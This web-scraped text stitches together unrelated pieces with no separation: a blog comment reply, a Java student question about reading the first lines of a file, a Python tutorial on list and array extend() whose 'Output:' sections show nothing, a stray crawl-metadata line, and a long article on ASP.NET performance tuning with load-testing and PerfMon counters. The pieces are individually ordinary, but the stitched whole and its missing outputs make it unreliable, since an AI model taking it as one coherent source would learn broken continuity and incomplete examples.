Host a web server on the MKR WiFi 1010
In this tutorial, we will use the MKR WiFi 1010 to set up a simple web server, using the WiFiNINA library. The web server will be used as an interface for our board, where we will create two buttons to remotely turn ON or OFF an LED.
If you have never used the WiFiNINA library, you can check out this tutorial that shows how to install the library.
Hardware needed
- Arduino MKR WiFi 1010
- Micro USB cable
- Generic LED
- 82 ohm resistor
- Breadboard
- Jumper wires
Circuit
Follow the wiring diagram below to connect the LED to the MKR WiFi 1010 board.
Schematic
This is the schematic of our circuit.
Software needed
- Arduino IDE (offline and online versions available).
- Arduino SAMD core installed, follow this link for instructions.
- WiFiNINA library (explained later in this tutorial).
Let's start
This tutorial uses barely any external hardware: we have only an LED that we will control remotely. But the most interesting aspect lies in the library we are going to use: WiFiNINA. This library can be used for many different connectivity projects, where we can connect to WiFi, make GET requests and, as we will explore in this tutorial, create a web server.
We will go through the following steps in order to create a web server on our MKR WiFi 1010:
- First, we need to initialize the WiFiNINA library.
- Then, we connect to our local WiFi by entering our
SSID (name of network) and
PASS (password of network).
- Once connected, the board starts hosting a server and waits for a client.
- If we now enter the IP address of our board in our regular browser (e.g. Chrome, Firefox) we connect as a client.
- As long as we are connected, the program detects it, and enters a
while() loop.
- In the
while() loop, two links are simply printed in HTML format, which is visible in the browser.
- These links control the LED we connected to the board, simply "ON" or "OFF".
- If we press the "ON" link, the program is configured to add an "H" to the end of the URL, or if we press the "OFF" link, we add an "L" to the end of the URL.
- If the URL ends with "H", it will turn on the LED, and if it ends with "L" it turns it off. H stands for "HIGH" and L stands for "LOW".
And that is the configuration we will be using in this tutorial. There are a few other functionalities, such as checking if we have the latest firmware and that we are using the right board, and these potential errors will be printed in the Serial Monitor.
Code explanation
NOTE: This section is optional, you can find the complete code further down this tutorial.
The initialization begins by including the WiFiNINA library, after which we need to enter our credentials to our network. If you want to, you can create a secret tab to store your credentials. This can be useful if you want to share your sketch online, and don't want anyone to see your credentials. You can find out how to do that in this tutorial.
#include <WiFiNINA.h>

char ssid[] = " ";   // your network SSID (name) between the " "
char pass[] = " ";   // your network password between the " "
int keyIndex = 0;    // your network key index number (needed only for WEP)

int status = WL_IDLE_STATUS;   // connection status
WiFiServer server(80);         // server socket
WiFiClient client = server.available();

int ledPin = 2;
We can then configure the
setup(). Here we set the Serial Communication to 9600, configure the
pinMode for our LED, and use the line
while (!Serial); so that the rest of the program only runs once we open the Serial Monitor. We do this since important information is printed in the Serial Monitor, and if we miss it at upload time, we cannot read it back. Then, we execute two functions:
enable_WiFi() and
connect_WiFi(), which we will use to connect to our WiFi. We then use
server.begin() to start hosting the server, once we are connected. The final function,
printWiFiStatus() simply prints the information about the connection status in the Serial Monitor. Here, we will see the IP address we need to connect to.
void setup() {
  Serial.begin(9600);
  pinMode(ledPin, OUTPUT);
  while (!Serial);
  enable_WiFi();
  connect_WiFi();
  server.begin();
  printWifiStatus();
}
The loop of this program is very short. First, we use
server.available() to check whether a
client has connected. If one has, we execute the
printWEB() function.
void loop() {
  client = server.available();

  if (client) {
    printWEB();
  }
}
Next up are the functions that we used in
setup(). These are
printWifiStatus(),
enable_WiFi(), and
connect_WiFi().
If we look at
printWifiStatus(), we can see that it prints various connection details in the Serial Monitor. Most importantly, it prints the board's IP address, which we will need to enter in the browser to control the Arduino.
void printWifiStatus() {
  // print the SSID of the network you're attached to:
  Serial.print("SSID: ");
  Serial.println(WiFi.SSID());

  // print your board's IP address:
  IPAddress ip = WiFi.localIP();
  Serial.print("IP Address: ");
  Serial.println(ip);

  // print the received signal strength:
  long rssi = WiFi.RSSI();
  Serial.print("signal strength (RSSI):");
  Serial.print(rssi);
  Serial.println(" dBm");

  Serial.print("To see this page in action, open a browser to http://");
  Serial.println(ip);
}

void enable_WiFi() {
  // check for the WiFi module:
  if (WiFi.status() == WL_NO_MODULE) {
    Serial.println("Communication with WiFi module failed!");
    // don't continue
    while (true);
  }

  String fv = WiFi.firmwareVersion();
  if (fv < "1.0.0") {
    Serial.println("Please upgrade the firmware");
  }
}

void connect_WiFi() {
  // the original listing was truncated here; the body below is the
  // standard WiFiNINA connection loop:
  while (status != WL_CONNECTED) {
    Serial.print("Attempting to connect to SSID: ");
    Serial.println(ssid);
    status = WiFi.begin(ssid, pass);

    // wait 10 seconds for connection:
    delay(10000);
  }
}
Now, we will look at the core of this program: the
printWEB() function, which we call from the
loop().
Here, we first begin by checking if
client is available, and if it is, we enter a
while() loop. Inside the while loop, we will use
client.print() to start printing HTML code that can be viewed in the browser. To avoid overloading the Arduino board's memory, we use a very basic setup: two links that turn the LED either ON or OFF.
This line of code is used to turn ON the LED, by adding a /H to the end of the URL.
client.print("Click <a href=\"/H\">here</a> to turn the LED on<br>");
This line of code is used to turn OFF the LED, by adding a /L to the end of the URL.
client.print("Click <a href=\"/L\">here</a> to turn the LED off<br>");
We will also make a reading of an analog pin (A1). Even though we do not have anything connected to it, this simply shows how we can also read something connected to the board and then print it to the client.
client.print("Random reading from analog pin: ");
client.print(randomReading);
When the printing is done, we use
break; to exit the while loop. Finally, the program checks whether an H or an L was added to the URL, and uses
digitalWrite(ledPin, STATE) to turn the LED ON or OFF.
void printWEB() {
  // (the request-parsing body below follows the standard WiFiNINA web
  // server example; the original listing was garbled in places)
  if (client) {                             // if you get a client,
    Serial.println("new client");
    String currentLine = "";                // holds incoming data from the client
    while (client.connected()) {            // loop while the client's connected
      if (client.available()) {             // if there are bytes to read,
        char c = client.read();             // read a byte, then
        Serial.write(c);                    // echo it to the Serial Monitor
        if (c == '\n') {

          // two newline characters in a row mark the end of the
          // client's HTTP request, so send a response:
          if (currentLine.length() == 0) {
            client.println("HTTP/1.1 200 OK");
            client.println("Content-type:text/html");
            client.println();

            // create the links
            client.print("Click <a href=\"/H\">here</a> to turn the LED on<br>");
            client.print("Click <a href=\"/L\">here</a> to turn the LED off<br>");

            int randomReading = analogRead(A1);
            client.print("Random reading from analog pin: ");
            client.print(randomReading);

            // the HTTP response ends with another blank line:
            client.println();
            break;                          // exit the while loop
          } else {                          // newline: clear currentLine
            currentLine = "";
          }
        } else if (c != '\r') {             // anything but a carriage return:
          currentLine += c;                 // add it to the end of currentLine
        }

        if (currentLine.endsWith("GET /H")) {
          digitalWrite(ledPin, HIGH);
        }
        if (currentLine.endsWith("GET /L")) {
          digitalWrite(ledPin, LOW);
        }
      }
    }
    // close the connection:
    client.stop();
    Serial.println("client disconnected");
  }
}
Complete code
If you choose to skip the code building section, the complete code can be found below:
Uploading the sketch and testing the program
Once we are finished with the coding, we can upload the sketch to the board. Once it is successful, open the Serial Monitor and it should look like the following image:
Copy the IP address and enter it in a browser. Now, we should see a very empty page with two links at the top left that say "Click here to turn the LED on" and "Click here to turn the LED off".
When interacting with the links, you should see the LED connected to pin 2 turn on and off depending on what you click, and we have successfully created a way of interacting with our MKR WiFi 1010 board remotely.
Troubleshoot
If the code is not working, there are some common issues we can troubleshoot:
- We have not updated to the latest firmware for the board.
- We have not installed the core required for the board.
- We have not installed the WiFiNINA library.
- We have entered the SSID and PASS incorrectly: remember, it is case sensitive.
- We have not selected the right port to upload to: depending on what computer we use, sometimes the board is duplicated in the port list. Simply restarting the editor can solve this issue.
Conclusion
In this tutorial, we learned how to create a basic web interface from scratch. We learned how to control an LED remotely, and how to display the value of an analog pin in the browser as well. Using this example, we can build much more complex projects, and if you are familiar with both HTML and CSS, you can probably create some really cool looking interfaces! If you are new to HTML and CSS, there are plenty of guides online that can help you; you can visit w3schools or codecademy for many tips and tricks.
NOTE: The memory of the Arduino MKR WiFi 1010 is not infinite. It is encouraged to use external CSS files if you are planning a bigger project, as this reduces memory usage.
Tip: Check out fontawesome to get access to thousands of free icons that you can customize your local web server with!
More tutorials
You can find more tutorials for this board in the MKR WiFi 1010 getting started page.
Authors: Karl Söderby. Reviewed by: Simone [18.07.2020]. Last revision: 26.06.2020
Red Hat Bugzilla – Bug 838757
xchat appears to expect an old version of python when loading plugins
Last modified: 2013-07-31 18:04:53 EDT
Description of problem:
xchat fails to load gtk-dependent python modules; in my case, pynotify.
Version-Release number of selected component (if applicable):
Name : xchat
Epoch : 1
Version : 2.8.8
Release : 13.fc17
Architecture: x86_64
How reproducible:
Attempt to load a module that imports pynotify
Steps to Reproduce:
1. Open xchat
2. /py exec import pynotify
Actual results:
xchat can't import pynotify, which fails while importing gtk:
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "/usr/lib64/python2.7/site-packages/gtk-2.0/pynotify/__init__.py", line 19, in <module>
import gtk
File "/usr/lib64/python2.7/site-packages/gtk-2.0/gtk/__init__.py", line 42, in <module>
import gdk
ImportError: No module named gdk
Expected results:
xchat can import pynotify
Additional info:
I wish I could offer more info, but I lack the expertise. pynotify and gtk work outside of xchat without. | https://bugzilla.redhat.com/show_bug.cgi?id=838757 | CC-MAIN-2018-13 | refinedweb | 178 | 55.03 |
WebReference.com - Perl Module Primer (2/5)
Perl Module Primer
Let's begin our basic module analysis with a look at a basic module:
package SayHello;

sub hello_message {
    return "Hello, World!";
}

1;
That's about as basic as you can get, but even in this simplest of examples you probably see some things that confuse you, or that you haven't encountered before. So let's take a closer look.
The Package
Each module contains a package declaration--usually as the first statement of the file--and this package declaration must match the name of the file itself (the file will additionally have a ".pm" extension; so, in our example above, the module would reside in a file called "SayHello.pm"). Technically, package names follow Perl rules for variable naming; but when used as a module the standard convention is to begin your package name with an upper-case letter, to avoid conflicts with Perl pragmas, which we will later see are invoked in Perl scripts via the same mechanism used by modules. Additionally, when selecting a name for your private packages, such as a package that you'll be using strictly within your own organization and not for public release, you should try to pick a name that won't conflict with other public packages that you might want to use in the future; and that also conforms to the naming conventions for files on your operating system (remember that for module development, the package name will also be the name of the file that contains the module code, with an added .pm extension). One possibility is to use an underscore in your package name, since publicly available packages typically do not contain underscores. So our example module above might become "Say_Hello." And, down the road, if you decide you'd like to contribute your own modules for public consumption, you can (and should) enlist the help of the Perl community at large to help you decide how to name your new module (and you may even find other authors and/or modules that may benefit from your work, or that can assist you directly). Many helpful hints on public module naming and creation can be found on CPAN. But for now, let's continue our basic analysis with a brief definition of packages.
So what exactly is a package? A package is a way to separate chunks of Perl code from each other so that their namespaces do not collide. In brief, a namespace represents the collected symbols--i.e., variable names, subroutine names, etc.--that a script is aware of. In your single script applications you probably didn't need to worry about namespaces much, since you could easily know what variables and subroutine names you had defined and could therefore avoid attempting to redefine a name that was already in use. But remember that a module is intended to be a separate, reusable code block; it may be used in many scripts that we do not have any control over in the future. Packages allow us to code our module using our own variable and routine names without having to worry about inadvertently clobbering someone else's variables, such as those of an employee of our company who decides to use our module to add functionality to their own script in the future.
While within a specific Perl package declaration, your script will have direct access only to the variables and functions defined within that package. By "direct access," I mean the ability to refer to the variables without any specific qualification; such as
$myVariable = "foobar";
print $myVariable;
There are, however, "indirect" ways to access and use certain variables and functions in a module, and we'll discuss them on the next page (indeed, if there weren't, there wouldn't be much point in writing a module in the first place!)
By the way, I realize that many of the "rules" I'm presenting to you in this brief article have exceptions that I'm not delving into purely in the interest in keeping this tutorial as simple as possible. For example, a package declaration is not restricted to appearing only in modules; in fact, it can appear in any section of code, at any time, can span multiple files, and multiple package declarations can even appear in a single module file. But a common use for package declarations is to separate the namespaces of individual modules (and to define classes when used in an OOP context) as above; so that's the usage we're focusing on here.
Where's the Code?
You may have noticed that our simple module above has no actual executing code; only a single subroutine definition that itself is never called. So what good is it?
Remember that modules are not intended to be standalone applications; we'll never actually be running our module by itself. Instead, we'll be using our module to provide added functionality to a larger script (and, more than likely, many separate scripts), and therefore it is common for a module to contain a series of subroutine definitions but little or no actual execution code. This is not a rule, however; a module can have its own executing code, such as "global" (global to the module, that is) variable definitions and initializations. Just remember that this code--whatever it is--will be executed by every script that uses this module (and, in fact, will be executed before the script that calls it is even compiled; more on that later).
Return true.
The seemingly stray "1;" at the end of our module is the last piece: when Perl loads a module file, the final statement evaluated must return a true value, otherwise Perl treats the load as a failure. A bare "1;" is the conventional way to satisfy this requirement.
While it's admittedly not at all useful (not many "Hello World" applications are) our module above is a complete, working construct, ready to be reused without modification in as many scripts as needed. But how do we actually use it in our own code? Chances are very good that you already know how...
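In fact, we can get a first taste right away. The snippet below is a sketch (the package is inlined into a single file purely so the example is self-contained; normally SayHello would stay in its own SayHello.pm and be pulled in with "use SayHello;"):

```perl
use strict;
use warnings;

# Normally this lives in SayHello.pm and is loaded with "use SayHello;".
package SayHello;
sub hello_message { return "Hello, World!"; }

package main;
# Fully qualified call into the SayHello namespace:
print SayHello::hello_message(), "\n";   # prints "Hello, World!"
```

The fully qualified name (SayHello::hello_message) is the "indirect" access mentioned earlier; exporting names into the caller's namespace is a refinement we'll meet later.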
Created: April 7, 2005
Revised: April 7, 2005
URL: | http://www.webreference.com/programming/perl/modules/2.html | CC-MAIN-2015-32 | refinedweb | 992 | 52.94 |
Visualize data from CSV file in Python
In today’s world, visualizing data is an important part of any domain. Visualized data is easy to understand that is why it is preferred over excel sheets. Python came to our rescue with its libraries like pandas and matplotlib so that we can represent our data in a graphical form.
In this tutorial, we will be learning how to visualize the data in the CSV file using Python.
Visualize a Data from CSV file in Python
First of all, we need to read data from the CSV file in Python.
Now since you know how to read a CSV file, let’s see the code.
import pandas as pd
import matplotlib.pyplot as plt

csv_file = 'data.csv'
data = pd.read_csv(csv_file)
We have imported matplotlib. It will be used for data visualization.
Let’s see our data.
We will now extract Genre and TotalVotes from this dataset.
Votes = data["TotalVotes"] Genre = data["Genre"]
Now, we will store these data into two different lists. We need to create two empty lists first.
x = []
y = []
We will use the built-in list() function, which converts a pandas Series into a Python list.
x = list(Genre)
y = list(Votes)
If we print x and y, we get
x = ['Biography', 'Action', 'Romance', 'Comedy', 'Horror']
y = [65, 75, 80, 90, 60]
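As an aside, if pandas is not available, the standard-library csv module can produce the same two lists; the sample data below is an assumption, reconstructed from the values shown above:

```python
import csv
import io

# Hypothetical sample matching the tutorial's Genre/TotalVotes columns.
sample = """Genre,TotalVotes
Biography,65
Action,75
Romance,80
Comedy,90
Horror,60
"""

def read_columns(text):
    """Parse CSV text and return (genres, votes) as two lists."""
    genres, votes = [], []
    for row in csv.DictReader(io.StringIO(text)):
        genres.append(row["Genre"])
        votes.append(int(row["TotalVotes"]))
    return genres, votes

genres, votes = read_columns(sample)
print(genres)  # ['Biography', 'Action', 'Romance', 'Comedy', 'Horror']
print(votes)   # [65, 75, 80, 90, 60]
```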
matplotlib lets us draw different types of graphs like,
- Bar charts and Histograms
- Scatter plot
- Stem plots
- Line plots
- Spectrograms
- Pie charts
- Contour plots
- Quiver plots
Today, We will see a scatter plot, bar chart, and pie chart.
Scatter Plot from CSV data in Python
To draw a scatter plot, we write
plt.scatter(x, y)
plt.xlabel('Genre->')
plt.ylabel('Total Votes->')
plt.title('Data')
plt.show()
xlabel and ylabel set the labels for the x-axis and y-axis respectively.
plt.title lets us set a title for our graph.
To show the graph, we use the show() function.
This is our scatter plot.
Bar Plot from CSV data in Python
Similarly, for a bar chart:
plt.bar(x,y)
We get,
bar plot
Pie Chart from CSV Data in Python
And for the pie chart, we write:
plt.pie(y, labels=x, autopct='%.2f%%')
Here, label is used to provide a name inside the respective portion in the chart.
autopct shows the percentage for each portion.
pie chart
So, this is how we can visualize our data using Python. If you have any doubts, don’t forget to mention them in the comment section below.
Also, learn:
- Plotting sine and cosine graph using matloplib in python
- Print frequency of each character in a string in Python
Correction: plt.pie(y,labels=x,autopct=’%.2f%%’)
Hi, I tried this code, but the problem is that the kernel keeps running after the plt.show() command. Do you perhaps have an idea how to solve this problem?
Hello,
I’m getting error :-
ValueError: could not convert string to float: ’01 Laptop’
Code :-
csv_file=’tabuladata.csv’
data = pd.read_csv(csv_file)
Item = data[“Item”]
Price = data[“Price”]
x=[]
y=[]
x=list(Item)
y=list(Price)
plt.pie(x,labels=y,autopct=’%.2f%%’)
plt.show()
Probably I need to convert the data type or I messed up with something else. | https://www.codespeedy.com/visualize-data-from-csv-file-in-python/ | CC-MAIN-2020-45 | refinedweb | 540 | 75 |
File::HTTP - open, read and seek into remote files and directories transparently
use File::HTTP qw(:open);

# open and read a remote file (server must allow range queries)
open(my $fh, '<', '') or die $!;
while (<$fh>) {
    chomp;
    ...
}

# remote file is seekable in all directions
seek($fh, 500, 0);
read($fh, my $buf, 40);
seek($fh, -40, 1);
read($fh, my $buf2, 40);

# $/ behaves as with regular files
local $/ = \52;
$buf = <$fh>;

# also works with https addresses if IO::Socket::SSL is available
open(my $fh, '<', '') or die $!;

# open() still works as expected with local files
open(my $fh, '<', "local_file") or die $!;

# directory (when servers allow directory listing)
use File::HTTP qw(:opendir);
opendir(my $dirh, '') or die $!;
while (my $file = readdir($dirh)) {
    next if $file =~ /^\.\.?$/;
    open(my $fh, '<', "") or die $!;
    ...
}

# open remote file, but not seekable
# works with all web servers, and faster (real filehandle)
use File::HTTP qw(open_stream);
my $fh = open_stream('') or die $!;
while (<$fh>) {
    chomp;
    ...
}

# make your module HTTP compatible when File::HTTP is installed.
# on top of module:
eval {use File::HTTP qw(:open)};
File::HTTP opens, reads and seeks into remote files and directories transparently
Imported with the :open or :all tags.
Act exactly as CORE::open and CORE::stat, but also work with remote HTTP files.
Falls back to CORE::open and CORE::stat when the path looks like a local file.
Returns a tied filehandle when opening a remote file.
Only works with Web servers that allow range queries (see CAVEATS).
You should use
open_stream when servers do not allow range queries.
Imported with the :opendir or :all tags.
Act exactly as CORE::opendir and associated CORE functions, but also work with remote HTTP directories.
Falls back to CORE::opendir when the path looks like a local directory.
Returns a tied filehandle when opening a remote directory.
Only works with Web servers that allow directory listing.
Opens a readable but not seekable filehandle to the specified URL.
Context-dependent slurping of a URL.
my $content = slurp_stream($url);
my @lines = slurp_stream($url);
Slurps a URL into a string, also returning the request and response header strings in list context. Contrary to slurp_stream, the default behavior is to ignore redirections.
my $body = get($url); my $body = get($url, 1); # follow redirections my ($request_headers, $response_headers, $body) = get($url);
If set to follow redirections, $request_headers and $response_headers will correspond to the last emitted request.
Nothing by default. Functions can be imported explicitely
use File::HTTP qw(open open_stream opendir readdir);
The :open and :opendir tags are much preferred, as they will ensure all needed functions are exported
use File::HTTP qw(:open);    # same as: use File::HTTP qw(open stat);
use File::HTTP qw(:opendir); # same as: use File::HTTP qw(opendir readdir rewinddir telldir seekdir closedir);
You can use the :all tag to import all functions
use File::HTTP qw(:all);
You can also use the -everywhere tag to export emulation functions into all namespaces (dangerous!)
use File::HTTP qw(-everywhere); # now all modules shall magically work with remote files (or not)
open only works with remote web servers and resources that allow range queries.
Dynamic resources such as PHP or CGI typically do not work with range queries.
open_stream does not have such limitations, but does not allow seeks.
opendir only works with remote web servers and resources that allow directory listing, and lists files as simple <a href> links.
Thomas Drugeon, <tdrugeon@cpan.org>
This library is free software; you can redistribute it and/or modify it under the same terms as Perl itself, either Perl version 5.14.2 or, at your option, any later version of Perl 5 you may have available. | http://search.cpan.org/dist/File-HTTP/lib/File/HTTP.pod | CC-MAIN-2016-36 | refinedweb | 605 | 62.38 |
03 December 2012 18:00 [Source: ICIS news]
HOUSTON (ICIS)--Here is Monday's midday US markets snapshot:
CRUDE: Jan WTI: $89.22/bbl, up 31 cents; Jan Brent: $111.09/bbl, down 14 cents
NYMEX WTI crude futures attempted to extend recent gains, but the rally was capped as the stock market worked lower following the release of a report showing
RBOB: Jan: $2.7486, up 1.83 cents/gal
Reformulated gasoline blendstock for oxygen blending (RBOB) prices traded higher mid-day as more buyers came into the market on the first day of trading on the January RBOB contract as the prompt month.
NATURAL GAS: Jan: $3.593/MMBtu, up 3.2 cents
Natural gas futures were recovering slightly this morning after two successive sessions of sell-offs on Thursday and Friday as warm temperature outlooks and high inventory levels stung any traction on the Henry Hub benchmark.
ETHANE: lower at 26.00 cents/gal
Ethane prices fell in early trading on Monday, setting another record low.
AROMATICS: benzene flat at $4.87-4.95/gal
US benzene prices discussions were thin early in the day. As a result, spot prices were unchanged from Friday.
OLEFINS: ethylene offered flat at 51.375 cents/lb, RGP flat at 49.00-49 | http://www.icis.com/Articles/2012/12/03/9620679/noon-snapshot-americas-markets-summary.html | CC-MAIN-2015-11 | refinedweb | 211 | 68.16 |
As I am currently working on some GUI applications that take input into text boxes, I have decided to enhance these programs a little further.
The above program, in the form it was in when the screenshot was taken, didn't take into account what was actually entered into the text box: it could be blank or contain text, neither of which is going to produce any useful output (if any).
number = raw_input("Enter a number ")
i = number.isdigit()
while i != True:
    print("Input MUST be a number")
    number = raw_input("number of sides to shape ")
    i = number.isdigit()
print number
Taking the isdigit function, which I found a few months ago, I set about integrating it with the code for the program above. This took a bit of trial and error, but it now works: if anything other than a numerical value is entered, the entry box displays an error message. A consequence of this is that if the entry box is blank (null), the same thing happens.
So I have now added the code for this,
def test():
    msg = "error : must be a numerical value"
    i = testbox.get()
    y = i.isdigit()
    if y != True:
        testbox.insert(0, msg)
    else:
        x = int(testbox.get())      # get user input
        testbox.delete(0, END)      # clear user input
        testbox.insert(0, bin(x))   # print user input converted into the required base
Before I set about doing this to my actual base converter program (screenshot), I wrote a program that had a window, a text entry box and a button, so that I could test everything out. It worked, so I then integrated it into my program and changed variable and object names to suit.
Adding checking like this is important, as it reduces problems with programs.
The same idea could be applied if text is required, as the function isalpha is used to check whether something is alphabetical.
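One way to make this kind of checking easy to test outside any GUI is to factor it into a plain function; the sketch below uses a function name of my own choosing, not one from the original program:

```python
def parse_number(text):
    """Return the integer value of text, or None if it is not a
    non-negative whole number; empty strings also fail."""
    return int(text) if text.isdigit() else None

print(parse_number("42"))   # 42
print(parse_number(""))     # None
print(parse_number("abc"))  # None
```

The GUI callback can then call parse_number() and only touch the entry box when the result is None, keeping the validation logic reusable.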
Also, if you are going to add new features to something, writing a stand-alone program first to make sure it works really helps. I have the basic input test program in two versions, one text-based and one graphical; it adds to my library of routines and solutions that can be called upon later if I need them in future projects.
As always any questions please e-mail me or tweet me at @zleap14
I will be at the Exeter Pi jam on the 7th and the Torbay Pi jam on the 14 of June. | http://zleap.net/gui-programming-10-error-checking/ | CC-MAIN-2019-04 | refinedweb | 426 | 66.67 |
On Tue, 19 Feb 2008, Geert Uytterhoeven wrote:
> On Tue, 19 Feb 2008, Petr Stehlik wrote:
> > Petr Stehlik wrote:
> > > GeOW, if I set the DefaultDepth to 16 and use the cfb16 driver will it know how
> > > to switch the framebuffer to Falcon truecolor mode?
>
> Yes it should.

Finally I managed to get fbset and fbtest (from sf.net CVS) through the
network into my virtual Atari. I fixed 2 brown paper bag bugs in fbtest,
which now works fine in all modes (interleaved bitplanes at 1/2/4/8 bpp
and packed pixels at 16 bpp). So in theory, X should work in 16 bpp mode,
too.

Oh well, may the all night hackers fix it ;-)

---
 drivers/video/atafb.c | 21 +++++++++++++++++++++
 1 file changed, 21 insertions(+)

--- a/drivers/video/atafb.c
+++ b/drivers/video/atafb.c
@@ -2549,6 +2549,13 @@ static void atafb_fillrect(struct fb_inf
 	if (!rect->width || !rect->height)
 		return;
 
+#ifdef ATAFB_FALCON
+	if (info->var.bits_per_pixel == 16) {
+		cfb_fillrect(info, rect);
+		return;
+	}
+#endif
+
 	/*
 	 * We could use hardware clipping but on many cards you get around
 	 * hardware clipping by writing to framebuffer directly.
@@ -2583,6 +2590,13 @@ static void atafb_copyarea(struct fb_inf
 	u32 dx, dy, sx, sy, width, height;
 	int rev_copy = 0;
 
+#ifdef ATAFB_FALCON
+	if (info->var.bits_per_pixel == 16) {
+		cfb_copyarea(info, area);
+		return;
+	}
+#endif
+
 	/* clip the destination */
 	x2 = area->dx + area->width;
 	y2 = area->dy + area->height;
@@ -2629,6 +2643,13 @@ static void atafb_imageblit(struct fb_in
 	const char *src;
 	u32 dx, dy, width, height, pitch;
 
+#ifdef ATAFB_FALCON
+	if (info->var.bits_per_pixel == 16) {
+		cfb_imageblit(info, image);
+		return;
+	}
+#endif
+
 	/*
 	 * We could use hardware clipping but on many cards you get around
 	 * hardware clipping by writing to framebuffer directly like we
-
List<String> items = new ArrayList<String>(Arrays.asList("Frist".split(",")))
String itemOne = items[2].toString()
Admin
It's converting from a one-based array to a zero-based array, perhaps:
itemZero = items[1].toString()
posterior-brained way of doing it, I'll admit ...
Admin
... or perhaps the first couple of elements are placeholders of some kind, or otherwise ignorable elements.
Still doesn't excuse its fundament-headedness.
Admin
Well, well well...
Apparently you live under a rock and haven't had much to do with CI engines... Groovy is very much alive and kicking...
Not a quality WTF more than a rant about being ignorant... I expect much better from this site!
Admin
I'd say it's a decent-quality WTF, in the sense that anybody unfamiliar with Groovy (me, for instance) is going to go "WTF?"
The fact that Remy is concerned with something as piffling as a variable name, when the very same line seems to need toString() to "convert" something that has apparently been extracted from a collection of String into, er, a String .... well, either this example is even more borked than it looks, or else three familiar letters spring to mind.
Admin
TRWTF is that Groovy is supposed to be a dynamic language. Instead, the code in this example looks very much like Java, except the items[2] that would be items.get(2) in Java.
Admin
The first line could actually make sense, if the original coder wanted to append or remove elements from the list later on.
split() returns an array, so to modify its length, you need to convert it into a list. That's why Arrays.asList() is there. However, you still can't modify the resulting ArrayList, because the instance is of a specific subclass that's unmodifiable. If you want a "real" ArrayList, you've got to feed the result of Arrays.asList() to "new ArrayList<>()".
The real WTFs I see in the first line of this code are 1. that split() returns an array and 2. ArrayList doesn't have a varargs constructor, but you'd have to blame that on Java, not Groovy itself.
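The fixed-size behaviour described here is easy to demonstrate; the sketch below (class and method names are mine) shows that the list returned by Arrays.asList() rejects add(), while copying it into a real ArrayList makes it growable:

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

public class AsListDemo {
    // The fixed-size view backed by the split() array.
    static List<String> fixed() {
        return Arrays.asList("a,b,c".split(","));
    }

    // A real, growable copy of that view.
    static List<String> growable() {
        return new ArrayList<>(fixed());
    }

    public static void main(String[] args) {
        boolean grew;
        try {
            fixed().add("d");   // throws UnsupportedOperationException
            grew = true;
        } catch (UnsupportedOperationException e) {
            grew = false;
        }
        System.out.println(grew);   // false

        List<String> g = growable();
        g.add("d");                 // fine on the copy
        System.out.println(g);      // [a, b, c, d]
    }
}
```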
Another WTF is that this is meant to be an example for Groovy while it's not even using Groovy syntax. Converted to Groovy, this code would look like this:
def items = string.split(",") as ArrayList
def itemOne = item[2]
Addendum 2017-07-31 07:28: Edit: The last line is missing a line break after ArrayList.
Admin
Without knowing what else is being done with "items", it's hard to call this a big WTF... this is also almost 100% Java code (which is also perfectly valid groovy). The final toString() is unnecessary, but certainly not really deserving of a whole article.
Admin
The WTF here isn't Groovy. The code shown is Java, which is a subset of Groovy. Only a Java programmer would program like this in Groovy. In Groovy, you can simply do:
def items = data.split(",") as List
def item = list[2]
If you care about typing, you could make it:
List<String> items = data.split(",") as List // or possibly as List<String>, it's been a while since I've done Groovy.
The WTF about the itemOne = items[2] has nothing to do with Groovy or Java; it's just a programmer being silly, which you can do in any language.
Admin
I guess the real WTF is that thedailyWTF's editor starts adding
tags only halfway through my post, and adds closing </string> tags at the end because I'm discussing generics.
Admin
Also itemOne might be perfectly reasonable, as the first useful item in a list of things, the first couple of entries could be unneeded identifiers and this field is actual what they are interested in. I think the WTF is that the WTF is not a WTF.
Admin
Yeah... I wouldn't put this one on the language, but on the programmer being an idiot.
In java, just as in groovy, all this mess can be written as:
String itemTwo = data.split(",")[2];
Admin
Careful. Down that slippery slope lie people excusing PHP as "it's not the language but all the idiots using it".
Admin
Seems like the biggest problem is not checking whether the List we came up with actually has two or more items before indexing into it?
But, then again, not knowing the use case, maybe throwing an exception is the right thing to do if you have a short list.
Admin
but it IS the idiots using (abusing) it. not that I care, I work in a Real Language
Admin
Definitely weak. I thought my recent submission might've been a little on the weak side but if this is all the higher they're setting the bar...
Admin
+1. STILL waiting for mine.
Admin
I have to write groovy occasionally for Jenkins integration. It is by far the most interesting programming language to try to google. My favorite is the time I was trying to connect to an SMB share from a Jenkins job, and it was a Linux host, so naturally I googled "groovy samba."
Admin
and item should be items?
Admin
Seems like run of the mill (but poorly written) Java. Assuming you're not interested in adding out-of-bound checks, the code can be reduced to:
Admin
FTFY
Admin
Ah yes. The infamous off-by-two error. A very common and easily made mistake.
Admin
Not much different than this semi sanitized code snippet I've come across many times:
Admin
Groovy is a dumb language. I got one bug:
In Ruby: a hash (map) is {}, while a list is [].
In Groovy, a map with one element is ['a':'b']. When I tried to make an empty map, I used []. Turned out it was a stupid list.
I hated Groovy from that day.
Admin
Probably not.
I suspect that there is a good reason why items is defined as an ArrayList rather than a native array. Most likely so it can be updated later on in the code.
really, the only thing that's odd here is why the developer is casting it to an ArrayList<String> when Arrays.asList already returns a List, and items is defined as a List. | https://thedailywtf.com/articles/comments/groovy-typing-man | CC-MAIN-2017-43 | refinedweb | 1,049 | 74.39 |
Hello, go ahead and create a fresh project and copy the following code into it.
package com.TTS;

import java.util.Locale;

import android.app.Activity;
import android.os.Bundle;
import android.speech.tts.TextToSpeech;

public class TTS extends Activity implements TextToSpeech.OnInitListener {

    private TextToSpeech tts;

    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);
        // Initialize the engine; onInit is called once it is ready.
        tts = new TextToSpeech(this, this);
    }

    @Override
    public void onInit(int status) {
        if (status == TextToSpeech.SUCCESS) {
            Locale loc = new Locale("eng", "", "");
            if (tts.isLanguageAvailable(loc) >= TextToSpeech.LANG_AVAILABLE) {
                tts.setLanguage(loc);
            }
            tts.speak("Text to speech in ANDROID from coderzheaven, Hope you like it.", TextToSpeech.QUEUE_FLUSH, null);
        }
    }

    @Override
    protected void onDestroy() {
        super.onDestroy();
        tts.shutdown();
    }
}
After running this application you will hear the sound that is given as text in this line.
tts.speak(“Text to speech in ANDROID from coderzheaven, Hope you like it.”, TextToSpeech.QUEUE_FLUSH, null);
Please leave your comments if this post was useful.
Great info dude thanks for useful article. I’m waiting for more
